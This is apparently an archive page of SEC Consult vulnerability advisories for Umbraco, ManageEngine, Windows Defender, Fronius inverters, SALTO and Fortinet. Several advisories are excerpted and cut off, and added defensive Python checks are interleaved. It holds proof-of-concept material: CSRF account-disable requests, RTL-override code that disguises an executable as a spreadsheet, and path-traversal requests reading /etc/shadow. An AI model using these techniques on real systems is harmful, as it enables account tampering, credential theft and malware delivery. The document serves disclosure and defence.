SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS

2020-01-23 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
===
  title: Cross-Site Request Forgery (CSRF)
product: Umbraco CMS
 vulnerable version: version 8.2.2
  fixed version: version 8.5
 CVE number: CVE-2020-7210
 impact: medium
   homepage: https://umbraco.com/
  found: October 2019
 by: A. Melnikova (Office Moscow)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:

The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without the victim noticing.
This attack always requires some sort of user interaction: usually the victim
needs to click on an attacker-prepared link or visit a page under the
attacker's control. In this case, an attacker is able to enable, disable or
delete user accounts, which may lead to a DoS of those accounts.


Proof of concept:
-
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.

Example 1: HTML-code for disabling user:


  
  history.pushState('', '', '/')

  

  


Request:

POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 


Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}


Example 2: HTML-code for enabling user:

  
  history.pushState('', '', '/')

  

  


Request:

POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 


Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}


Example 3: HTML-code for deleting user:

  
  history.pushState('', '', '/')

  

  



Request:

POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
Host: 
[...]
Cookie: 


Response:
-
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User  was deleted","message":"","type":3}],"message":"User  was deleted"}


As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload would get executed in the context of the victim's
session. Although responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising requests to other sites.
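As an added illustration (not code from the advisory or from Umbraco), the following Python classifies backoffice requests of the kind shown in the three examples: a cookie-authenticated POST to one of the listed endpoints is rejected when Origin/Referer names a foreign host or when a double-submit anti-forgery token is missing. The endpoint paths come from the advisory; the cookie name, token names and host values are assumptions.

```python
from urllib.parse import urlsplit

# State-changing backoffice endpoints named in the advisory.
STATE_CHANGING = {
    "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers",
    "/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers",
    "/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser",
}
# Hypothetical cookie/header pair for a double-submit anti-forgery token;
# the advisory does not describe the mechanism the fixed version uses.
TOKEN_COOKIE = "XSRF-TOKEN"
TOKEN_HEADER = "x-xsrf-token"


def parse_cookies(header_value):
    """Split a Cookie header into a dict (empty when the header is absent)."""
    cookies = {}
    for part in (header_value or "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def source_host(headers):
    """Host named by Origin (preferred) or Referer; None if neither is sent."""
    for name in ("origin", "referer"):
        if headers.get(name):
            return urlsplit(headers[name]).hostname
    return None


def classify(method, path, headers):
    """Classify one request as 'accept', 'ignore' or 'reject:<reason>'.

    Only cookie-authenticated POSTs to the listed endpoints are judged. A
    request is rejected when Origin/Referer names another host (the PoC
    pages above are served from the attacker's site) or when the token
    header does not match the token cookie (a cross-site form cannot set
    custom headers, so a forged POST carries no such header at all).
    """
    headers = {k.lower(): v for k, v in headers.items()}
    if method.upper() != "POST" or urlsplit(path).path not in STATE_CHANGING:
        return "ignore"
    cookies = parse_cookies(headers.get("cookie"))
    if not cookies:
        return "ignore"  # no ambient credential, nothing to ride on
    host = headers.get("host", "").split(":")[0]
    src = source_host(headers)
    if src is not None and src != host:
        return "reject:cross-site request from %s" % src
    token = cookies.get(TOKEN_COOKIE)
    if not token or headers.get(TOKEN_HEADER) != token:
        return "reject:missing or mismatched anti-forgery token"
    return "accept"


# Constructed sample requests (cookie, token and host values are made up).
# FORGED mirrors Example 1 above: a cookie-bearing POST from a foreign page.
DISABLE = "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=7"
FORGED = ("POST", DISABLE, {
    "Host": "cms.example.test",
    "Origin": "https://attacker.example",
    "Cookie": "SESSION=s3ss10n",
})
FORGED_NO_ORIGIN = ("POST", DISABLE, {
    "Host": "cms.example.test",
    "Cookie": "SESSION=s3ss10n; XSRF-TOKEN=t0k3n",
})
LEGIT = ("POST", DISABLE, {
    "Host": "cms.example.test",
    "Origin": "https://cms.example.test",
    "Cookie": "SESSION=s3ss10n; XSRF-TOKEN=t0k3n",
    "X-XSRF-TOKEN": "t0k3n",
})

if __name__ == "__main__":
    for label, req in (("forged", FORGED), ("forged, no Origin", FORGED_NO_ORIGIN),
                       ("legitimate", LEGIT)):
        print("%-18s %s" % (label, classify(*req)))
```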



Vulnerable / tested versions:
-
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:

2019-11-13: Contacting vendor through secur...@umbraco.com.
2019-11-13: Requesting encryption keys.

SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus

2020-01-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 >
===
  title: Reflected XSS
product: ZOHO ManageEngine ServiceDeskPlus
 vulnerable version: <= 11.0 Build 11007
  fixed version: 11.0 Build 11010
 CVE number: CVE-2020-6843
 impact: medium
   homepage: https://www.manageengine.com/products/service-desk/
  found: 2019-12-01
 by: Johannes Kruchem (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting
to delivering awesome customer service. It provides great visibility and central
control in dealing with IT issues to ensure that businesses suffer no downtime.
For 10 years and running, it has been delivering smiles to millions of IT folks,
end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/



Business recommendation:

The vendor published a patch for ServiceDesk Plus with service pack 11010.

It is recommended to install the patch with the included patcher. An in-depth
security analysis performed by security professionals is highly advised, as the
software may be affected by further security issues.


Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (CVE-2020-6843)
A parameter of the module called "geti18nkey" reflects unfiltered user input
once its value is changed. The corresponding request is sent frequently in the
background while a pre-configured network scan is running.


Proof of concept:
-
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue visit this URL authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey=

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan frequent requests like
   
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>"
   are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single character.
   The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
   
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey="


Vulnerable / tested versions:
-
The following versions have been tested, which were the latest versions
available at the time of the test:
 - 10.5
 - 11.0 Build 11007


Vendor contact timeline:

2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC).
            Uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
-
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~

SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus

2019-12-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 >
===
  title: File Extension Spoofing
product: Windows Defender Antivirus
 vulnerable version: 4.18.1908.7-0
  fixed version: Virus Definition Update of 2019/09/30
 CVE number: -
 impact: High
   homepage: https://www.microsoft.com/de-at/windows/comprehensive-security
  found: 2019-09-25
 by: David Haintz (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Keep your PC safe with trusted antivirus protection built-in to Windows 10.
Windows Defender Antivirus delivers comprehensive, ongoing and real-time
protection against software threats like viruses, malware and spyware across
email, apps, the cloud and the web."

Source: https://www.microsoft.com/de-at/windows/comprehensive-security


Business recommendation:

Update to the latest version of the Windows Defender Antivirus definitions.


Vulnerability overview/description:
---
The vulnerability is based on the well-known file extension spoofing method that
uses the RTL (right-to-left override) unicode character to display a spoofed file
extension. This character instructs the text following it to be shown in
right-to-left order. Assuming [RTL] denotes this unicode character, an attacker
can use it to fool a user into believing that a file has a different extension.

For example, an attacker may name an executable file (.exe) 'spoofed-[RTL]gpj.exe',
which would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most
important point here is that the extension to be shown has to be written in
reverse order, since it will be rendered right-to-left.
Combined with the right file icon, an attacker can imitate an arbitrary file
extension.

The same goes for other extensions, like 'xlsx' for a Microsoft Excel sheet.
During testing it happened that 'xlsx' was typed in the wrong order (literally
'xlsx', which is displayed as 'xslx' because of the reversed order) and Windows
Defender Antivirus removed the test file while we tried to execute it.
As a result, two files were created with the exact same executable but with
different fake extensions:
1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx')
2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx')

The second one was deleted, while the first one could be executed without any
problem.

Therefore, other extensions related to Microsoft Office were tested as well,
but it seems only the xlsx extension has a detection for it.


While the security issue of spoofing the file extension by using the RTL
unicode character (on RTL systems it is the same, just with LTR) is widely
known, it seems to be unknown that Microsoft has already started to add
detection mechanisms for it. But since the detection is not implemented for all
extensions and seems to be implemented in the wrong order (it matches the
literal 'xlsx', i.e. the variant that is displayed as 'xslx'), this feature is
mostly unknown.
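The following Python is an added example (not the advisory's code) that makes the rendering argument above concrete: it simulates how a left-to-right file manager displays a name containing U+202E, and contrasts a literal-match rule modelled on the advisory's observation (fires on 'xlsx' after the override) with an order-independent rule that compares the displayed extension against the real one. The bidi-rendering simulation is a deliberate simplification that is exact for the plain-ASCII names used here.

```python
# Unicode bidi control characters: embeddings, overrides, isolates, their
# terminators and the two direction marks. All are invisible when rendered.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069", "\u200e", "\u200f"}
RLO, PDF = "\u202e", "\u202c"   # RIGHT-TO-LEFT OVERRIDE, POP DIRECTIONAL FORMATTING


def rendered_name(name):
    """Approximate what a left-to-right file manager displays for `name`.

    Text after an RLO is shown reversed until a PDF or the end of the string;
    other bidi controls contribute nothing. Finer points of the bidi
    algorithm (digit runs, neutrals) are ignored; for the advisory's
    plain-ASCII file names the result is exact.
    """
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def real_extension(name):
    """Extension the operating system actually acts on (after the last '.')."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def displayed_extension(name):
    """Extension a user reads off the rendered name."""
    return real_extension(rendered_name(name))


def naive_detect(name):
    """Literal rule in the spirit of the advisory's observation: fire when the
    override is followed by the string 'xlsx'. That variant renders as 'xslx',
    so the convincing file (override followed by 'xslx') is not caught."""
    return RLO + "xlsx" in name


def spoof_detect(name):
    """Order-independent rule: a bidi control is present and the extension the
    user sees differs from the extension the OS will use."""
    has_control = any(ch in BIDI_CONTROLS for ch in name)
    return has_control and displayed_extension(name) != real_extension(name)


if __name__ == "__main__":
    # Constructed names taken from the advisory's examples plus a benign one.
    for n in ("spoofed-\u202Exslx.exe", "spoofed-\u202Exlsx.exe",
              "spoofed-\u202Egpj.exe", "report.xlsx"):
        print(repr(n), "->", rendered_name(n), "| real:", real_extension(n),
              "| naive:", naive_detect(n), "| spoof:", spoof_detect(n))
```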


Proof of concept:
-
For the proof of concept a file has to be renamed in Unicode mode using the
Unicode character '202E' ('\u202E' in C), which stands for RTL override. The
sample code is written in C/C++ and uses the Unicode API of Windows. A Python
PoC has been made as well.

C/C++:

#include <windows.h>

int main(int argc, char** argv)
{
    wchar_t opath[] = L"test.exe";
    // U+202E (RIGHT-TO-LEFT OVERRIDE) follows 'spoofed-'; everything after it
    // is rendered reversed, so the visible extension must be typed backwards.
    wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe";    // shown as 'spoofed-exe.xlsx'
    wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // shown as 'spoofed-exe.xslx'

    // Copy 'test.exe' to the file shown as 'spoofed-exe.xlsx'
    CopyFileW(opath, npath_ok, FALSE);
    // Copy 'test.exe' to the file shown as 'spoofed-exe.xslx'
    CopyFileW(opath, npath_wrong, FALSE);
    return 0;
}


Python:

from shutil import copyfile

opath = "test.exe"
npath_ok = "spoofed-\u202Exslx.exe" # String for filename 'spoofed-exe.xlsx'
npath_wrong = "spoofed-\u202Exlsx.exe" # String for filename 'spoofed-exe.xslx'

# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
copyfile(opath, npath_ok)
# Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
copyfile(opath, npath_wrong)


There will be two new files after the execution (as long as 'test.exe' exists)
and the file shown as 'spoofed-exe.xslx' will be deleted while trying to execute
(or earlier) as shown in figure 1.

[ win-defender-ext-spoofing1.png ]
Figure 1: File gets deleted by Windows Defender Antivirus.


But the file shown as 'spoofed-exe.xlsx' will be executed without any problem.

[ win-defender-ext-spo

SEC Consult SA-20191203-0 :: Multiple vulnerabilites in Fronius Solar Inverter Series

2019-12-03 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
===
  title: Multiple vulnerabilites
product: Fronius Solar Inverter Series
 vulnerable version: SW Version <3.14.1 (HM 1.12.1)
  fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution
 section below
 CVE number: CVE-2019-19228, CVE-2019-19229
 impact: High
   homepage: https://www.fronius.com
  found: 2018-10-31
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"A passion for new technologies, intensive research and revolutionary solutions
have been shaping the Fronius brand since 1945. As the technology leader, we
find, develop and implement innovative methods to monitor and control energy
for welding technology, photovoltaics and battery charging. We forge new paths,
try something difficult and succeed where others have failed in achieving what
seems to be impossible. [...]"

Source: http://www.fronius.com/en/about-fronius/company-values


Business recommendation:

The vendor automatically performed a fleet update of the solar inverters in the
field in order to patch them. Nevertheless, as not all devices could be reached
through such an update, all remaining users are advised to install the patches
provided by the vendor immediately.


Vulnerability overview/description:
---
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor
in the current solar inverter generation, see the workaround section below.


2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows getting
access to the operating system of the device and access information like
network configurations and connections to other hosts or potentially other
sensitive information.

This vulnerability has been fixed in March 2019 in version 3.12.5 (HM 1.10.5).

The web server runs with "nobody" privileges, but nearly all files on the
file system are world-readable and can be extracted. This can be seen as
another vulnerability but according to the vendor this cannot be fixed in the
current solar inverter generation.


3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today".
This user account has all permissions of all other users ("service",
"admin" and "user") together.
As its name suggests, the password for the user "today" changes every day
and appears to differ between devices running the same firmware. This
means that some device-specific strings (e.g. the public device ID) are
mixed in every day to generate a new password.
This account is used by Fronius support in order to access the
device upon request from the user.

The fix for this issue has been split in two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1) and the second part, providing
the support account, needs an architectural rework which will be fixed in a
future version (planned for 3.15.1 (HM 1.15.1)).

The passwords for all users of the web interface are stored in plain-text.
This can be seen as another vulnerability and it has been fixed in
version 3.14.1 (HM 1.12.1).


4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination. Not all of the outdated components can be fixed by the
vendor in the current solar inverter generation, see the workaround section below.


Proof of concept:
-
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a
simple way.


2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
http:///admincgi-bin/service.fcgi

Request to read the "/etc/shadow" password file:
┌──
|GET /admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow
└──

As response, the file is returned without line breaks. In this example the
line breaks are added for better readability:

┌──
|HTTP/1.1 200 OK
|Content-Type: appli

SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE

2019-12-02 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
===
  title: Multiple Critical Vulnerabilities
product: SALTO ProAccess SPACE
 vulnerable version: <= v5.5
  fixed version: >= v5.6
 CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
 CVE-2019-19460
 impact: critical
   homepage: https://www.saltosystems.com/en/
  found: 2019-05-22
 by: Werner Schober (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"SALTO ProAccess SPACE Software is a powerful access control management
tool that enables you to program access time zones for each user,
manage different calendars and obtain audit trails from each door
to see who has passed through it. The software includes special
functions such as automatic door status changes, anti-passback
and relay management.

Thanks to its advanced software features, SALTO ProAccess SPACE is also
one of the most user-friendly and powerful software products for the
access control management of stand-alone wireless devices, and IP
online devices in one converged complete access control platform
for the user, keys and doors management."

Source: http://proaccess-space.saltosystems.com/features/


Business recommendation:

The vendor provides a patch which should be installed immediately.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers to access files and directories
outside the application root through relative file paths in user input. During
a quick security check, multiple locations in the web application were
identified which allow an attacker to traverse outside of the application root.
The vulnerabilities were identified in the "Data Export" as well as the
"Database Export" functionality. They can, for example, be used to dump the
whole database into the web root by traversing outside of the application
root.

2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the
"Data Export" feature, an attacker is able to traverse into arbitrary paths
and write arbitrary files with arbitrary contents, for example files into the
web root or batch files into the autostart folder. This allows an attacker to
execute arbitrary commands on the server.

3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.

4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
The webserver of the SALTO ProAccess SPACE is running as a Windows Service with
local SYSTEM permissions per default. This is against the principle of least
privilege. An attacker, who is able to exploit the path traversal, or arbitrary
file write vulnerability, is basically able to write to every single path
on the file system, because the webserver is running with the highest
privileges available.

5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web application
that should normally only be callable by highly privileged users. Nevertheless,
by calling the API directly with the OAuth token of a low privileged user, it was
possible to invoke some API calls that should not be available to that user.

6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows its users to create so-called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON or CSV format. It is transmitted in
cleartext and leaks sensitive data such as who opened which door and when,
including card IDs etc.


Proof of concept:
-
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in
SALTO ProAccess SPACE allow users to specify a filename for the different
exports. By using special characters inside of the filename, an attacker is
able to traverse outside of the designated export path and place the exports
in arbitrary locations. For example, the following filename can be used
in the database export to store the database backup inside of the webroot:

..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
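As an added example (not code from SALTO, Fronius or SEC Consult), the following Python shows a containment check for a user-supplied export or download name that handles both forms quoted in these advisories: the '../' form from the Fronius CGI request above and the '..\' Windows form from the SALTO export. Base directory and sample names are constructed; the SALTO sample is completed with a made-up extension.

```python
import posixpath
from urllib.parse import unquote


def canonical_relative(user_path):
    """Decode and normalise a user-supplied file name into a '/'-separated
    relative path, or return None when it is not a plain relative path.

    Both separators are treated alike (SALTO's export used '..\\', the
    Fronius request '../'); percent-encoding is undone until stable so
    '%252e%252e' cannot slip through; NUL bytes, absolute paths and drive
    letters are rejected outright.
    """
    decoded = user_path
    for _ in range(3):                      # bounded: stop on a fixed point
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        return None
    p = decoded.replace("\\", "/")
    if p.startswith("/") or (len(p) > 1 and p[1] == ":"):
        return None                         # absolute or drive-qualified
    return posixpath.normpath(p)


def contained_path(base, user_path):
    """Return base joined with user_path, or None if the result would leave
    base. On a real file system follow this with os.path.realpath() and the
    same prefix check so a symlink inside base cannot redirect the write."""
    rel = canonical_relative(user_path)
    if rel is None or rel in (".", "..") or rel.startswith("../"):
        return None
    return posixpath.join(base, rel)


def looks_like_traversal(user_path):
    """True when the name escapes or is malformed: a cheap log-side check for
    request parameters such as the ones quoted in both advisories."""
    return contained_path("/base", user_path) is None


# Constructed inputs; the first two follow the advisories' own PoC values.
SAMPLES = [
    "../../../../../etc/shadow",
    r"..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.bak",
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "C:\\Windows\\win.ini",
    "reports/2019/export.csv",
    "reports/../export.csv",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-60r -> %r" % (s, contained_path("/srv/export", s)))
```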

Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products

2019-11-26 Thread SEC Consult Vulnerability Lab
Hi,

we received incorrect version information during the coordination phase thus
our initial advisory stated that FortiOS v6.0.7 fixes the issue. Fortinet has
just now confirmed that only v6.2.0 includes the patch. See their advisory:
https://fortiguard.com/psirt/FG-IR-18-100

SEC Consult Vulnerability Lab


On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
> ===
>   title: FortiGuard XOR Encryption
> product: Multiple Fortinet Products (see Vulnerable / tested versions)
>  vulnerable version: Multiple (see Vulnerable / tested versions)
>   fixed version: Multiple (see Solution)
>  CVE number: CVE-2018-9195
>  impact: High
>homepage: https://www.fortinet.com
>   found: 2018-05-16
> 
>  by: Stefan Viehböck (Office Vienna)
>      SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "From the start, the Fortinet vision has been to deliver broad, truly
> integrated, high-performance security across the IT infrastructure.
> 
> We provide top-rated network and content security, as well as secure access
> products that share intelligence and work together to form a cooperative
> fabric. Our unique security fabric combines Security Processors, an intuitive
> operating system, and applied threat intelligence to give you proven security,
> exceptional performance, and better visibility and control--while providing
> easier administration."
> 
> Source: https://www.fortinet.com/corporate/about-us/about-us.html
> 
> 
> Business recommendation:
> 
> The vendor provides a patch and users of affected products are urged to
> immediately upgrade to the latest version available.
> 
> 
> Vulnerability overview/description:
> ---
> Fortinet products, including FortiGate and Forticlient regularly send
> information to Fortinet servers (DNS: guard.fortinet.com) on
> - UDP ports 53,  and
> - TCP port 80 (HTTP POST /fgdsvc)
> 
> This cloud communication is used for the FortiGuard Web Filter feature 
> (https://fortiguard.com/webfilter),
> FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
> and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).
> 
> The messages are encrypted using XOR "encryption" with a static key.
> 
> 
> The protocol messages contain the following types of information:
> 
> **Serial number of the Fortinet product installation** (product type + unique ID).
> This information allows an attacker who can **passively monitor** internet traffic to:
> - learn which Fortinet products and product types an organization uses
>   (this is valuable for information gathering, see EquationGroup Fortigate exploits)
> - learn which FortiClient installations are part of an organization
> - use the FortiClient serial number as a unique identifier to track an individual as
>   he/she travels the world
> 
> 
> **Full HTTP URLs of users web surfing activity** (Web Filter feature).
> This information allows an attacker who can **passively monitor** internet traffic
> to spy on users' web surfing activity. In cases where SSL inspection is enabled,
> even the URLs of HTTPS-encrypted communication are sent via this protocol,
> effectively breaking the confidentiality of SSL/TLS.
> 
> 
> **Unspecified email data** (AntiSpam feature).
> We do not have any further information on what kind of information is sent by the
> AntiSpam feature.
> 
> 
> **Unspecified AntiVirus data** (AntiVirus feature).
> We do not have any further information on what kind of information is sent by the
> AntiVirus feature.
> 
> 
> By **intercepting and manipulating** internet traffic an attacker can:
> Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus features.
> 
> 
> Proof of concept:
> -
> The following Python 3 script decrypts a FortiGuard message (the static XOR key
> has been removed from this advisory).
> 
> 
> ```python
> from itertools import cycle
> 
> def forti_xor(s1):
> xor_key = **removed**
> message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
> return message
> 
> r1=bytes.f

SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products

2019-11-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
===
  title: FortiGuard XOR Encryption
product: Multiple Fortinet Products (see Vulnerable / tested versions)
 vulnerable version: Multiple (see Vulnerable / tested versions)
  fixed version: Multiple (see Solution)
 CVE number: CVE-2018-9195
 impact: High
   homepage: https://www.fortinet.com
  found: 2018-05-16

 by: Stefan Viehböck (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Business recommendation:

The vendor provides a patch and users of affected products are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
---
Fortinet products, including FortiGate and FortiClient, regularly send
information to Fortinet servers (DNS: guard.fortinet.com) on
- UDP ports 53,  and
- TCP port 80 (HTTP POST /fgdsvc)

This cloud communication is used for the FortiGuard Web Filter feature
(https://fortiguard.com/webfilter), the FortiGuard AntiSpam feature
(https://fortiguard.com/updates/antispam) and the FortiGuard AntiVirus feature
(https://fortiguard.com/updates/antivirus).

The messages are encrypted using XOR "encryption" with a static key.


The protocol messages contain the following types of information:

**Serial number of the Fortinet product installation** (product type + unique ID).
This information allows an attacker who can **passively monitor** internet traffic to:
- learn which Fortinet products and product types an organization uses
  (this is valuable for information gathering, see EquationGroup Fortigate exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an individual as
  he/she travels the world


**Full HTTP URLs of users' web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet traffic
to spy on users' web surfing activity. In cases where SSL inspection is enabled,
